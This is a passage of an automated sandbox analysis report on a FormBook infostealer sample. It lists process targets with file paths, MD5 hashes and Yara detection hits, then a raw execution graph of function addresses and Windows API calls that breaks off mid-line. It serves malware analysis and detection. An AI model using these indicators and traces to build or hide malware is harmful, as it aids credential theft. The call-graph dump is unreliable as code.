                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2552000811.0000000002140000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:4
                                                      Start time:07:54:53
                                                      Start date:25/11/2024
                                                      Path:C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exe"
                                                      Imagebase:0x750000
                                                      File size:140'800 bytes
                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3303269624.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:false

                                                      Target ID:6
                                                      Start time:07:54:54
                                                      Start date:25/11/2024
                                                      Path:C:\Windows\SysWOW64\icsunattend.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\SysWOW64\icsunattend.exe"
                                                      Imagebase:0xd00000
                                                      File size:13'824 bytes
                                                      MD5 hash:6D01FCE30EF8A2CA0D385593E90879E5
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3303150675.0000000004120000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3301917962.0000000000430000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3303084240.0000000000CB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low
                                                      Has exited:false

                                                      Target ID:7
                                                      Start time:07:55:08
                                                      Start date:25/11/2024
                                                      Path:C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exe"
                                                      Imagebase:0x750000
                                                      File size:140'800 bytes
                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:false

                                                      Target ID:8
                                                      Start time:07:55:19
                                                      Start date:25/11/2024
                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                      Imagebase:0x7ff79f9e0000
                                                      File size:676'768 bytes
                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Reset < >

                                                        Execution Graph

                                                        Execution Coverage:4%
                                                        Dynamic/Decrypted Code Coverage:0.4%
                                                        Signature Coverage:7.5%
                                                        Total number of Nodes:2000
                                                        Total number of Limit Nodes:65
                                                        execution_graph 93257 eb19cb 93262 e42322 93257->93262 93259 eb19d1 93295 e60f0a 52 API calls __cinit 93259->93295 93261 eb19db 93263 e42344 93262->93263 93296 e426df 93263->93296 93270 e4d7f7 48 API calls 93271 e4238e 93270->93271 93272 e4d7f7 48 API calls 93271->93272 93273 e42398 93272->93273 93274 e4d7f7 48 API calls 93273->93274 93275 e423de 93274->93275 93276 e4d7f7 48 API calls 93275->93276 93277 e424c1 93276->93277 93309 e4263f 93277->93309 93281 e424f1 93282 e4d7f7 48 API calls 93281->93282 93283 e424fb 93282->93283 93338 e42745 93283->93338 93285 e42546 93286 e42556 GetStdHandle 93285->93286 93287 e425b1 93286->93287 93288 eb501d 93286->93288 93289 e425b7 CoInitialize 93287->93289 93288->93287 93290 eb5026 93288->93290 93289->93259 93345 e892d4 53 API calls 93290->93345 93292 eb502d 93346 e899f9 CreateThread 93292->93346 93294 eb5039 CloseHandle 93294->93289 93295->93261 93347 e42854 93296->93347 93300 e4234a 93301 e4272e 93300->93301 93428 e427ec 6 API calls 93301->93428 93303 e4237a 93304 e4d7f7 93303->93304 93305 e5f4ea 48 API calls 93304->93305 93306 e4d818 93305->93306 93307 e5f4ea 48 API calls 93306->93307 93308 e42384 93307->93308 93308->93270 93310 e4d7f7 48 API calls 93309->93310 93311 e4264f 93310->93311 93312 e4d7f7 48 API calls 93311->93312 93313 e42657 93312->93313 93429 e426a7 93313->93429 93316 e426a7 48 API calls 93317 e42667 93316->93317 93318 e4d7f7 48 API calls 93317->93318 93319 e42672 93318->93319 93320 e5f4ea 48 API calls 93319->93320 93321 e424cb 93320->93321 93322 e422a4 93321->93322 93323 e422b2 93322->93323 93324 e4d7f7 48 API calls 93323->93324 93325 e422bd 93324->93325 93326 e4d7f7 48 API calls 93325->93326 93327 e422c8 93326->93327 93328 e4d7f7 48 API calls 93327->93328 93329 e422d3 93328->93329 93330 e4d7f7 48 API calls 93329->93330 93331 e422de 93330->93331 93332 e426a7 48 API calls 93331->93332 93333 e422e9 93332->93333 93334 e5f4ea 48 API calls 93333->93334 93335 e422f0 93334->93335 93336 eb1fe7 93335->93336 93337 e422f9 RegisterWindowMessageW 93335->93337 93337->93281 93339 e42755 93338->93339 93340 eb5f4d 93338->93340 93341 e5f4ea 48 API calls 93339->93341 93434 e8c942 50 API calls 93340->93434 93344 e4275d 93341->93344 93343 eb5f58 93344->93285 93345->93292 93346->93294 93435 e899df 54 API calls 93346->93435 93365 e42870 93347->93365 93350 e42870 48 API calls 93351 e42864 93350->93351 93352 e4d7f7 48 API calls 93351->93352 93353 e42716 93352->93353 93354 e46a63 93353->93354 93355 e46adf 93354->93355 93357 e46a6f __wsetenvp 93354->93357 93385 e4b18b 93355->93385 93358 e46ad7 93357->93358 93359 e46a8b 93357->93359 93384 e4c369 48 API calls 93358->93384 93372 e46b4a 93359->93372 93362 e46ab6 ___crtGetEnvironmentStringsW 93362->93300 93363 e46a95 93375 e5ee75 93363->93375 93366 e4d7f7 48 API calls 93365->93366 93367 e4287b 93366->93367 93368 e4d7f7 48 API calls 93367->93368 93369 e42883 93368->93369 93370 e4d7f7 48 API calls 93369->93370 93371 e4285c 93370->93371 93371->93350 93389 e5f4ea 93372->93389 93374 e46b54 93374->93363 93377 e5f4ea __calloc_impl 93375->93377 93376 e6395c std::exception::_Copy_str 47 API calls 93376->93377 93377->93376 93378 e5f50c 93377->93378 93379 e5f50e std::exception::exception 93377->93379 93378->93362 93420 e66805 RaiseException 93379->93420 93381 e5f538 93421 e6673b 47 API calls _free 93381->93421 93383 e5f54a 93383->93362 93384->93362 93386 e4b199 93385->93386 93388 e4b1a2 ___crtGetEnvironmentStringsW 93385->93388 93386->93388 93422 e4bdfa 93386->93422 93388->93362 93391 e5f4f2 __calloc_impl 93389->93391 93392 e5f50c 93391->93392 93393 e5f50e std::exception::exception 93391->93393 93398 e6395c 93391->93398 93392->93374 93412 e66805 RaiseException 93393->93412 93395 e5f538 93413 e6673b 47 API calls _free 93395->93413 93397 e5f54a 93397->93374 93399 e639d7 __calloc_impl 93398->93399 93407 e63968 __calloc_impl 93398->93407 93419 e67c0e 47 API calls __getptd_noexit 93399->93419 93402 e6399b RtlAllocateHeap 93402->93407 93411 e639cf 93402->93411 93404 e639c3 93417 e67c0e 47 API calls __getptd_noexit 93404->93417 93407->93402 93407->93404 93408 e639c1 93407->93408 93409 e63973 93407->93409 93418 e67c0e 47 API calls __getptd_noexit 93408->93418 93409->93407 93414 e681c2 47 API calls __NMSG_WRITE 93409->93414 93415 e6821f 47 API calls 7 library calls 93409->93415 93416 e61145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 93409->93416 93411->93391 93412->93395 93413->93397 93414->93409 93415->93409 93417->93408 93418->93411 93419->93411 93420->93381 93421->93383 93423 e4be0d 93422->93423 93427 e4be0a ___crtGetEnvironmentStringsW 93422->93427 93424 e5f4ea 48 API calls 93423->93424 93425 e4be17 93424->93425 93426 e5ee75 48 API calls 93425->93426 93426->93427 93427->93388 93428->93303 93430 e4d7f7 48 API calls 93429->93430 93431 e426b0 93430->93431 93432 e4d7f7 48 API calls 93431->93432 93433 e4265f 93432->93433 93433->93316 93434->93343 93436 e4ef80 93439 e53b70 93436->93439 93438 e4ef8c 93440 e53bc8 93439->93440 93463 e542a5 93439->93463 93441 e53bef 93440->93441 93443 eb6fd1 93440->93443 93445 eb6f7e 93440->93445 93452 eb6f9b 93440->93452 93442 e5f4ea 48 API calls 93441->93442 93444 e53c18 93442->93444 93534 e9ceca 335 API calls Mailbox 93443->93534 93447 e5f4ea 48 API calls 93444->93447 93445->93441 93448 eb6f87 93445->93448 93486 e53c2c __wsetenvp ___crtGetEnvironmentStringsW 93447->93486 93531 e9d552 335 API calls Mailbox 93448->93531 93449 eb6fbe 93533 e8cc5c 86 API calls 4 library calls 93449->93533 93452->93449 93532 e9da0e 335 API calls 2 library calls 93452->93532 93453 e542f2 93553 e8cc5c 86 API calls 4 library calls 93453->93553 93456 eb73b0 93456->93438 93457 eb7297 93542 e8cc5c 86 API calls 4 library calls 93457->93542 93458 eb737a 93552 e8cc5c 86 API calls 4 library calls 93458->93552 93460 e5dce0 53 API calls 93460->93486 93546 e8cc5c 86 API calls 4 library calls 93463->93546 93465 eb707e 93535 e8cc5c 86 API calls 4 library calls 93465->93535 93467 e540df 93543 e8cc5c 86 API calls 4 library calls 93467->93543 93471 e5f4ea 48 API calls 93471->93486 93472 e4d645 53 API calls 93472->93486 93475 eb72d2 93544 e8cc5c 86 API calls 4 library calls 93475->93544 93477 e4fe30 335 API calls 93477->93486 93479 eb7350 93550 e8cc5c 86 API calls 4 library calls 93479->93550 93480 eb72e9 93545 e8cc5c 86 API calls 4 library calls 93480->93545 93481 eb7363 93551 e8cc5c 86 API calls 4 library calls 93481->93551 93485 e46a63 48 API calls 93485->93486 93486->93453 93486->93457 93486->93458 93486->93460 93486->93463 93486->93465 93486->93467 93486->93471 93486->93472 93486->93475 93486->93477 93486->93479 93486->93480 93486->93481 93486->93485 93489 eb714c 93486->93489 93491 eb733f 93486->93491 93493 e46eed 48 API calls 93486->93493 93495 e4d286 48 API calls 93486->93495 93497 e53f2b 93486->93497 93499 e5ee75 48 API calls 93486->93499 93509 eb71e1 93486->93509 93511 e4d9a0 53 API calls __cinit 93486->93511 93512 e4d83d 53 API calls 93486->93512 93513 e4cdb9 48 API calls 93486->93513 93514 e4d6e9 93486->93514 93518 e5c15c 48 API calls 93486->93518 93519 e5c050 93486->93519 93530 e5becb 335 API calls 93486->93530 93536 e4dcae 50 API calls Mailbox 93486->93536 93537 e9ccdc 48 API calls 93486->93537 93538 e8a1eb 50 API calls 93486->93538 93539 e9ccdc 48 API calls 93489->93539 93549 e8cc5c 86 API calls 4 library calls 93491->93549 93492 eb715f 93498 eb71a1 93492->93498 93540 e9ccdc 48 API calls 93492->93540 93493->93486 93495->93486 93497->93438 93541 e5c15c 48 API calls 93498->93541 93499->93486 93504 eb71ce 93505 e5c050 48 API calls 93504->93505 93507 eb71d6 93505->93507 93506 eb71ab 93506->93463 93506->93504 93508 eb7313 93507->93508 93507->93509 93547 e8cc5c 86 API calls 4 library calls 93508->93547 93509->93497 93548 e8cc5c 86 API calls 4 library calls 93509->93548 93511->93486 93512->93486 93513->93486 93515 e4d6f4 93514->93515 93516 e4d71b 93515->93516 93554 e4d764 55 API calls 93515->93554 93516->93486 93518->93486 93520 e5c064 93519->93520 93522 e5c069 Mailbox 93519->93522 93555 e5c1af 48 API calls 93520->93555 93528 e5c077 93522->93528 93556 e5c15c 48 API calls 93522->93556 93524 e5f4ea 48 API calls 93526 e5c108 93524->93526 93525 e5c152 93525->93486 93527 e5f4ea 48 API calls 93526->93527 93529 e5c113 93527->93529 93528->93524 93528->93525 93529->93486 93529->93529 93530->93486 93531->93497 93532->93449 93533->93443 93534->93486 93535->93497 93536->93486 93537->93486 93538->93486 93539->93492 93540->93492 93541->93506 93542->93467 93543->93497 93544->93480 93545->93497 93546->93497 93547->93497 93548->93497 93549->93497 93550->93497 93551->93497 93552->93497 93553->93456 93554->93516 93555->93522 93556->93528 93557 e43742 93558 e4374b 93557->93558 93559 e437c8 93558->93559 93560 e43769 93558->93560 93598 e437c6 93558->93598 93562 e437ce 93559->93562 93563 eb1e00 93559->93563 93564 e43776 93560->93564 93565 e4382c PostQuitMessage 93560->93565 93561 e437ab DefWindowProcW 93566 e437b9 93561->93566 93567 e437f6 SetTimer RegisterWindowMessageW 93562->93567 93568 e437d3 93562->93568 93612 e42ff6 16 API calls 93563->93612 93570 eb1e88 93564->93570 93571 e43781 93564->93571 93565->93566 93567->93566 93575 e4381f CreatePopupMenu 93567->93575 93572 eb1da3 93568->93572 93573 e437da KillTimer 93568->93573 93627 e84ddd 60 API calls _memset 93570->93627 93576 e43836 93571->93576 93577 e43789 93571->93577 93580 eb1da8 93572->93580 93581 eb1ddc MoveWindow 93572->93581 93609 e43847 Shell_NotifyIconW _memset 93573->93609 93574 eb1e27 93613 e5e312 335 API calls Mailbox 93574->93613 93575->93566 93602 e5eb83 93576->93602 93584 e43794 93577->93584 93585 eb1e6d 93577->93585 93587 eb1dcb SetFocus 93580->93587 93588 eb1dac 93580->93588 93581->93566 93590 e4379f 93584->93590 93591 eb1e58 93584->93591 93585->93561 93626 e7a5f3 48 API calls 93585->93626 93586 eb1e9a 93586->93561 93586->93566 93587->93566 93588->93590 93592 eb1db5 93588->93592 93589 e437ed 93610 e4390f DeleteObject DestroyWindow Mailbox 93589->93610 93590->93561 93614 e43847 Shell_NotifyIconW _memset 93590->93614 93625 e855bd 70 API calls _memset 93591->93625 93611 e42ff6 16 API calls 93592->93611 93597 eb1e68 93597->93566 93598->93561 93600 eb1e4c 93615 e44ffc 93600->93615 93603 e5ec1c 93602->93603 93604 e5eb9a _memset 93602->93604 93603->93566 93628 e451af 93604->93628 93606 e5ec05 KillTimer SetTimer 93606->93603 93607 e5ebc1 93607->93606 93608 eb3c7a Shell_NotifyIconW 93607->93608 93608->93606 93609->93589 93610->93566 93611->93566 93612->93574 93613->93590 93614->93600 93616 e45027 _memset 93615->93616 93704 e44c30 93616->93704 93620 e450ac 93621 eb3d28 Shell_NotifyIconW 93620->93621 93622 e450ca Shell_NotifyIconW 93620->93622 93623 e451af 50 API calls 93622->93623 93624 e450df 93623->93624 93624->93598 93625->93597 93626->93598 93627->93586 93629 e452a2 Mailbox 93628->93629 93630 e451cb 93628->93630 93629->93607 93650 e46b0f 93630->93650 93633 e451e6 93635 e46a63 48 API calls 93633->93635 93634 eb3ca1 LoadStringW 93637 eb3cbb 93634->93637 93636 e451fb 93635->93636 93636->93637 93638 e4520c 93636->93638 93639 e4510d 48 API calls 93637->93639 93640 e45216 93638->93640 93641 e452a7 93638->93641 93644 eb3cc5 93639->93644 93655 e4510d 93640->93655 93664 e46eed 93641->93664 93647 e45220 _memset _wcscpy 93644->93647 93668 e4518c 93644->93668 93646 eb3ce7 93649 e4518c 48 API calls 93646->93649 93648 e45288 Shell_NotifyIconW 93647->93648 93648->93629 93649->93647 93651 e5f4ea 48 API calls 93650->93651 93652 e46b34 93651->93652 93653 e46b4a 48 API calls 93652->93653 93654 e451d9 93653->93654 93654->93633 93654->93634 93656 e4511f 93655->93656 93657 eb1be7 93655->93657 93678 e4b384 93656->93678 93687 e7a58f 48 API calls ___crtGetEnvironmentStringsW 93657->93687 93660 eb1bf1 93662 e46eed 48 API calls 93660->93662 93661 e4512b 93661->93647 93663 eb1bf9 Mailbox 93662->93663 93665 e46f00 93664->93665 93666 e46ef8 93664->93666 93665->93647 93693 e4dd47 48 API calls ___crtGetEnvironmentStringsW 93666->93693 93669 e45197 93668->93669 93670 eb1ace 93669->93670 93671 e4519f 93669->93671 93672 e46b4a 48 API calls 93670->93672 93694 e45130 93671->93694 93675 eb1adb __wsetenvp 93672->93675 93674 e451aa 93674->93646 93676 e5ee75 48 API calls 93675->93676 93677 eb1b07 ___crtGetEnvironmentStringsW 93676->93677 93679 e4b392 93678->93679 93686 e4b3c5 ___crtGetEnvironmentStringsW 93678->93686 93680 e4b3fd 93679->93680 93681 e4b3b8 93679->93681 93679->93686 93683 e5f4ea 48 API calls 93680->93683 93688 e4bb85 93681->93688 93684 e4b407 93683->93684 93685 e5f4ea 48 API calls 93684->93685 93685->93686 93686->93661 93687->93660 93689 e4bb9b 93688->93689 93692 e4bb96 ___crtGetEnvironmentStringsW 93688->93692 93690 e5ee75 48 API calls 93689->93690 93691 eb1b77 93689->93691 93690->93692 93692->93686 93693->93665 93695 e4513f __wsetenvp 93694->93695 93696 e45151 93695->93696 93697 eb1b27 93695->93697 93698 e4bb85 48 API calls 93696->93698 93699 e46b4a 48 API calls 93697->93699 93700 e4515e ___crtGetEnvironmentStringsW 93698->93700 93701 eb1b34 93699->93701 93700->93674 93702 e5ee75 48 API calls 93701->93702 93703 eb1b57 ___crtGetEnvironmentStringsW 93702->93703 93705 e44c44 93704->93705 93706 eb3c33 93704->93706 93705->93620 93708 e85819 61 API calls _W_store_winword 93705->93708 93706->93705 93707 eb3c3c DestroyIcon 93706->93707 93707->93705 93708->93620 93709 eb9bec 93734 e50ae0 Mailbox ___crtGetEnvironmentStringsW 93709->93734 93713 e515b5 93886 e8cc5c 86 API calls 4 library calls 93713->93886 93714 e51526 Mailbox 93885 e8cc5c 86 API calls 4 library calls 93714->93885 93715 e50509 93888 e8cc5c 86 API calls 4 library calls 93715->93888 93716 e5146e 93723 e46eed 48 API calls 93716->93723 93719 e5f4ea 48 API calls 93739 e4fec8 93719->93739 93721 e51473 93887 e8cc5c 86 API calls 4 library calls 93721->93887 93722 eba922 93741 e4ffe1 Mailbox 93723->93741 93725 eba246 93729 e46eed 48 API calls 93725->93729 93728 e46eed 48 API calls 93728->93739 93729->93741 93730 eba873 93731 eba30e 93731->93741 93883 e797ed InterlockedDecrement 93731->93883 93732 e797ed InterlockedDecrement 93732->93739 93733 e4d7f7 48 API calls 93733->93739 93734->93714 93734->93739 93734->93741 93745 eba706 93734->93745 93747 e5f4ea 48 API calls 93734->93747 93748 e797ed InterlockedDecrement 93734->93748 93752 e4fe30 93734->93752 93781 ea0d09 93734->93781 93784 e96ff0 93734->93784 93793 ea0d1d 93734->93793 93796 e9f0ac 93734->93796 93828 e8a6ef 93734->93828 93834 e4ce19 93734->93834 93840 e9e822 93734->93840 93882 e9ef61 82 API calls 2 library calls 93734->93882 93737 e60f0a 52 API calls __cinit 93737->93739 93738 eba973 93889 e8cc5c 86 API calls 4 library calls 93738->93889 93739->93713 93739->93715 93739->93716 93739->93719 93739->93721 93739->93725 93739->93728 93739->93731 93739->93732 93739->93733 93739->93737 93739->93738 93739->93741 93880 e51820 335 API calls 2 library calls 93739->93880 93881 e51d10 59 API calls Mailbox 93739->93881 93742 eba982 93884 e8cc5c 86 API calls 4 library calls 93745->93884 93747->93734 93748->93734 93753 e4fe50 93752->93753 93776 e4fe7e 93752->93776 93754 e5f4ea 48 API calls 93753->93754 93754->93776 93755 e5146e 93756 e46eed 48 API calls 93755->93756 93780 e4ffe1 93756->93780 93757 e4d7f7 48 API calls 93757->93776 93758 e50509 93895 e8cc5c 86 API calls 4 library calls 93758->93895 93761 e5f4ea 48 API calls 93761->93776 93763 e60f0a 52 API calls __cinit 93763->93776 93764 eba922 93764->93734 93765 eba246 93769 e46eed 48 API calls 93765->93769 93766 e51473 93894 e8cc5c 86 API calls 4 library calls 93766->93894 93768 e46eed 48 API calls 93768->93776 93769->93780 93771 eba873 93771->93734 93772 eba30e 93772->93780 93892 e797ed InterlockedDecrement 93772->93892 93774 e797ed InterlockedDecrement 93774->93776 93775 eba973 93896 e8cc5c 86 API calls 4 library calls 93775->93896 93776->93755 93776->93757 93776->93758 93776->93761 93776->93763 93776->93765 93776->93766 93776->93768 93776->93772 93776->93774 93776->93775 93778 e515b5 93776->93778 93776->93780 93890 e51820 335 API calls 2 library calls 93776->93890 93891 e51d10 59 API calls Mailbox 93776->93891 93893 e8cc5c 86 API calls 4 library calls 93778->93893 93779 eba982 93780->93734 93897 e9f8ae 93781->93897 93783 ea0d19 93783->93734 93785 e4936c 81 API calls 93784->93785 93786 e9702a 93785->93786 94045 e4b470 93786->94045 93788 e9703a 93789 e4fe30 335 API calls 93788->93789 93791 e9705f 93788->93791 93789->93791 93792 e97063 93791->93792 94073 e4cdb9 48 API calls 93791->94073 93792->93734 93794 e9f8ae 129 API calls 93793->93794 93795 ea0d2d 93794->93795 93795->93734 93797 e4d7f7 48 API calls 93796->93797 93798 e9f0c0 93797->93798 93799 e4d7f7 48 API calls 93798->93799 93800 e9f0c8 93799->93800 93801 e4d7f7 48 API calls 93800->93801 93802 e9f0d0 93801->93802 93803 e4936c 81 API calls 93802->93803 93817 e9f0de 93803->93817 93804 e46a63 48 API calls 93804->93817 93805 e9f2cc 93806 e9f2f9 Mailbox 93805->93806 94101 e46b68 48 API calls 93805->94101 93806->93734 93807 e9f2b3 93811 e4518c 48 API calls 93807->93811 93809 e9f2ce 93814 e4518c 48 API calls 93809->93814 93810 e46eed 48 API calls 93810->93817 93812 e9f2c0 93811->93812 93815 e4510d 48 API calls 93812->93815 93813 e4c799 48 API calls 93813->93817 93816 e9f2dd 93814->93816 93815->93805 93819 e4510d 48 API calls 93816->93819 93817->93804 93817->93805 93817->93806 93817->93807 93817->93809 93817->93810 93817->93813 93818 e4bdfa 48 API calls 93817->93818 93820 e4bdfa 48 API calls 93817->93820 93825 e4936c 81 API calls 93817->93825 93826 e4518c 48 API calls 93817->93826 93827 e4510d 48 API calls 93817->93827 93821 e9f175 CharUpperBuffW 93818->93821 93819->93805 93822 e9f23a CharUpperBuffW 93820->93822 94090 e4d645 93821->94090 94100 e5d922 55 API calls 2 library calls 93822->94100 93825->93817 93826->93817 93827->93817 93829 e8a6fb 93828->93829 93830 e5f4ea 48 API calls 93829->93830 93831 e8a709 93830->93831 93832 e8a717 93831->93832 93833 e4d7f7 48 API calls 93831->93833 93832->93734 93833->93832 93835 e4ce28 __wsetenvp 93834->93835 93836 e5ee75 48 API calls 93835->93836 93837 e4ce50 ___crtGetEnvironmentStringsW 93836->93837 93838 e5f4ea 48 API calls 93837->93838 93839 e4ce66 93838->93839 93839->93734 93841 e9e868 93840->93841 93842 e9e84e 93840->93842 94106 e9ccdc 48 API calls 93841->94106 94105 e8cc5c 86 API calls 4 library calls 93842->94105 93845 e9e871 93846 e4fe30 334 API calls 93845->93846 93848 e9e8cf 93846->93848 93847 e9e860 Mailbox 93847->93734 93848->93847 93849 e9e96a 93848->93849 93851 e9e916 93848->93851 93850 e9e978 93849->93850 93853 e9e9c7 93849->93853 94125 e8a69d 48 API calls 93850->94125 94107 e89b72 48 API calls 93851->94107 93853->93847 93856 e4936c 81 API calls 93853->93856 93855 e9e949 94108 e545e0 93855->94108 93859 e9e9e1 93856->93859 93857 e9e99b 94126 e4bc74 48 API calls 93857->94126 93861 e4bdfa 48 API calls 93859->93861 93863 e9ea05 CharUpperBuffW 93861->93863 93862 e9e9a3 Mailbox 94127 e53200 93862->94127 93864 e9ea1f 93863->93864 93866 e9ea72 93864->93866 93867 e9ea26 93864->93867 93868 e4936c 81 API calls 93866->93868 94199 e89b72 48 API calls 93867->94199 93869 e9ea7a 93868->93869 94200 e41caa 49 API calls 93869->94200 93872 e9ea54 93873 e545e0 334 API calls 93872->93873 93873->93847 93874 e9ea84 93874->93847 93875 e4936c 81 API calls 93874->93875 93876 e9ea9f 93875->93876 94201 e4bc74 48 API calls 93876->94201 93878 e9eaaf 93879 e53200 334 API calls 93878->93879 93879->93847 93880->93739 93881->93739 93882->93734 93883->93741 93884->93714 93885->93741 93886->93741 93887->93730 93888->93722 93889->93742 93890->93776 93891->93776 93892->93780 93893->93780 93894->93771 93895->93764 93896->93779 93933 e4936c 93897->93933 93899 e9f8ea 93900 e9f92c Mailbox 93899->93900 93953 ea0567 93899->93953 93900->93783 93902 e9fb8b 93903 e9fcfa 93902->93903 93908 e9fb95 93902->93908 94017 ea0688 89 API calls Mailbox 93903->94017 93906 e9fd07 93907 e9fd13 93906->93907 93906->93908 93907->93900 93966 e9f70a 93908->93966 93909 e4936c 81 API calls 93926 e9f984 Mailbox 93909->93926 93914 e9fbc9 93980 e5ed18 93914->93980 93917 e9fbfd 93920 e5c050 48 API calls 93917->93920 93918 e9fbe3 94015 e8cc5c 86 API calls 4 library calls 93918->94015 93922 e9fc14 93920->93922 93921 e9fbee GetCurrentProcess TerminateProcess 93921->93917 93923 e51b90 48 API calls 93922->93923 93932 e9fc3e 93922->93932 93925 e9fc2d 93923->93925 93924 e9fd65 93924->93900 93929 e9fd7e FreeLibrary 93924->93929 93927 ea040f 105 API calls 93925->93927 93926->93900 93926->93902 93926->93909 93926->93926 94013 ea29e8 48 API calls ___crtGetEnvironmentStringsW 93926->94013 94014 e9fda5 60 API calls 2 library calls 93926->94014 93927->93932 93929->93900 93932->93924 93984 e51b90 93932->93984 94000 ea040f 93932->94000 94016 e4dcae 50 API calls Mailbox 93932->94016 93934 e49384 93933->93934 93951 e49380 93933->93951 93935 eb4cbd __i64tow 93934->93935 93936 eb4bbf 93934->93936 93937 e49398 93934->93937 93943 e493b0 __itow Mailbox _wcscpy 93934->93943 93938 eb4bc8 93936->93938 93939 eb4ca5 93936->93939 94018 e6172b 80 API calls 4 library calls 93937->94018 93938->93943 93945 eb4be7 93938->93945 94019 e6172b 80 API calls 4 library calls 93939->94019 93941 e5f4ea 48 API calls 93944 e493ba 93941->93944 93943->93941 93946 e4ce19 48 API calls 93944->93946 93944->93951 93947 e5f4ea 48 API calls 93945->93947 93946->93951 93948 eb4c04 93947->93948 93949 e5f4ea 48 API calls 93948->93949 93950 eb4c2a 93949->93950 93950->93951 93952 e4ce19 48 API calls 93950->93952 93951->93899 93952->93951 93954 e4bdfa 48 API calls 93953->93954 93955 ea0582 CharLowerBuffW 93954->93955 94020 e81f11 93955->94020 93959 e4d7f7 48 API calls 93960 ea05bb 93959->93960 94027 e469e9 48 API calls ___crtGetEnvironmentStringsW 93960->94027 93962 ea061a Mailbox 93962->93926 93963 ea05d2 93964 e4b18b 48 API calls 93963->93964 93965 ea05de Mailbox 93964->93965 93965->93962 94028 e9fda5 60 API calls 2 library calls 93965->94028 93967 e9f77a 93966->93967 93968 e9f725 93966->93968 93972 ea0828 93967->93972 93969 e5f4ea 48 API calls 93968->93969 93971 e9f747 93969->93971 93970 e5f4ea 48 API calls 93970->93971 93971->93967 93971->93970 93973 ea0a53 Mailbox 93972->93973 93979 ea084b _strcat _wcscpy __wsetenvp 93972->93979 93973->93914 93974 e4d286 48 API calls 93974->93979 93975 e4cf93 58 API calls 93975->93979 93976 e4936c 81 API calls 93976->93979 93977 e6395c 47 API calls std::exception::_Copy_str 93977->93979 93979->93973 93979->93974 93979->93975 93979->93976 93979->93977 94031 e88035 50 API calls __wsetenvp 93979->94031 93982 e5ed2d 93980->93982 93981 e5edc5 VirtualProtect 93983 e5ed93 93981->93983 93982->93981 93982->93983 93983->93917 93983->93918 93985 e51cf6 93984->93985 93989 e51ba2 93984->93989 93985->93932 93987 e51c5d 93987->93932 93988 e51bb9 93988->93987 93993 e5f4ea 48 API calls 93988->93993 93990 e5f4ea 48 API calls 93989->93990 93999 e51bae 93989->93999 93991 eb49c4 93990->93991 93992 e5f4ea 48 API calls 93991->93992 93998 eb49cf 93992->93998 93994 e51c9f 93993->93994 93995 e51cb2 93994->93995 94032 e42925 48 API calls 93994->94032 93995->93932 93997 e5f4ea 48 API calls 93997->93998 93998->93997 93998->93999 93999->93988 94033 e5c15c 48 API calls 93999->94033 94001 ea0427 94000->94001 94012 ea0443 94000->94012 94002 ea04f8 94001->94002 94003 ea042e 94001->94003 94004 ea044f 94001->94004 94001->94012 94043 e89dc5 103 API calls 94002->94043 94040 e87c56 50 API calls _strlen 94003->94040 94042 e4cdb9 48 API calls 94004->94042 94009 ea0438 94041 e4cdb9 48 API calls 94009->94041 94010 ea051e 94010->93932 94012->94010 94034 e61c9d 94012->94034 94013->93926 94014->93926 94015->93921 94016->93932 94017->93906 94018->93943 94019->93943 94021 e81f3b __wsetenvp 94020->94021 94022 e81f79 94021->94022 94023 e81f6f 94021->94023 94025 e81ffa 94021->94025 94022->93959 94022->93965 94023->94022 94029 e5d37a 60 API calls 94023->94029 94025->94022 94030 e5d37a 60 API calls 94025->94030 94027->93963 94028->93962 94029->94023 94030->94025 94031->93979 94032->93995 94033->93988 94035 e61ca6 RtlFreeHeap 94034->94035 94039 e61ccf __dosmaperr 94034->94039 94036 e61cbb 94035->94036 94035->94039 94044 e67c0e 47 API calls __getptd_noexit 94036->94044 94038 e61cc1 GetLastError 94038->94039 94039->94010 94040->94009 94041->94012 94042->94012 94043->94012 94044->94038 94046 e46b0f 48 API calls 94045->94046 94052 e4b495 94046->94052 94047 e4b69b 94076 e4ba85 48 API calls ___crtGetEnvironmentStringsW 94047->94076 94049 e4b6b5 Mailbox 94049->93788 94052->94047 94053 eb397b 94052->94053 94054 eb3939 ___crtGetEnvironmentStringsW 94052->94054 94061 e4ba85 48 API 